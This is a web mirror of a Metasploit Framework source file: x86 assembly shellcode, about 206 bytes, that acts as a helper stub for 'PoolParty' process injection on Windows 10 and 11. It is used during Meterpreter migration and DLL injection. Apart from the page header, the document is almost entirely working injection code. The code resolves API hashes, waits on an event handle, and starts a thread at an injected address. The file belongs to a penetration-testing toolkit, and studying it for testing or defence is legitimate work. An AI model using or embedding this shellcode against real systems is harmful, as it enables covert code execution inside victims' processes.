Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/windows/x86/src/migrate/poolparty.asm
28832 views
1
;-----------------------------------------------------------------------------;

2
; Author: Muzaffer Umut ŞAHİN (mailatmayinlutfen[at]gmail[dot]com)

3
; Compatible: Windows 11, 10

4
; Architecture: x86

5
; Version: 0.1 (Jan 2026)

6
; Size: 206 bytes

7
; Build: >build.py poolparty

8
;-----------------------------------------------------------------------------;

9


10
; Stub helper for pool-party injection.

11


12
;typedef struct _POOLPARTYCTX

13
;{

14
; 	union

15
;	{

16
;		LPVOID lpStartAddress;

17
;		BYTE bPadding1[8]; 

18
;	} s;

19
;	union

20
;	{

21
; 	LPVOID lpParameter;

22
;		BYTE bPadding2[8];

23
;	} p;

24
;	union

25
;	{

26
; 	LPVOID hEventTrigger;

27
;		BYTE bPadding2[8];

28
;	} e;

29
; 

30
;} POOLPARTYCTX, * LPPOOLPARTYCTX;

31
; Description:

32
;     This stub is executed during the Meterpreter migration and DLL Injection. The POOLPARTYCTX must be allocated ALWAYS at the end of the shellcode,

33
;     this is mandatory as some pool-party variants doesn't support arguments passing. Also an hEventTrigger during migration is mandatory because 

34
;     we need to wait the ok from the previous Meterpreter to continue the execution. with other techniques (RemoteThread and APC)

35
;     We are starting the process in SUSPENDED mode and then Resuming it, here we need to wait for an event.

36
;     This shellcode is done to work with multiple PoolParty variants.

37
;     Supported Variants:

38
;             - Worker Factory Overwrite

39


40
[BITS 32]

41


42
        push ebp

43
        push ebx

44
        push edi

45
        push esi    ; save registers

46
        mov esi,esp

47
        cld

48
        jmp _parameters

49
_main:

50
        pop ebp ; get block api in ebp and POOLPARTYCTX in ebx

51
        push -1 ; dwMilliSeconds = INFINTE

52
        push dword [ebx+16] ; hEventTrigger

53
        push 0x601D8708 ; hash("kernel32.dll","WaitForSingleObject")

54
        call ebp        ; WaitForSingleObject(hEventTrigger, INFINITE);

55
        xor edi,edi     ; Clear edi

56
        push edi ; lpThreadId

57
        push edi ; dwCreationFlags

58
        push dword [ebx+8] ; lpParameter

59
        push dword [ebx]   ; lpStartAddress

60
        push edi ; dwStackSize

61
        push edi ; lpThreadAttributes

62
        push 0x160D6838 ; hash("kernel32.dll","CreateThread")

63
        call ebp        ; CreateThread(NULL, 0, ctx->lpStartAddress, ctx->lpParameter, 0, NULL);

64
restore:

65
        mov esp,esi     ; restore stack

66
        pop esi 

67
        pop edi

68
        pop ebx

69
        pop ebp         ; restore registers

70
        ret

71


72
get_blockapi:

73
        call _main

74
%include "./../block/block_api.asm"

75


76
_cb_parameters:

77
        pop ebx

78
        call get_blockapi

79


80
_parameters:

81
        call _cb_parameters

82


83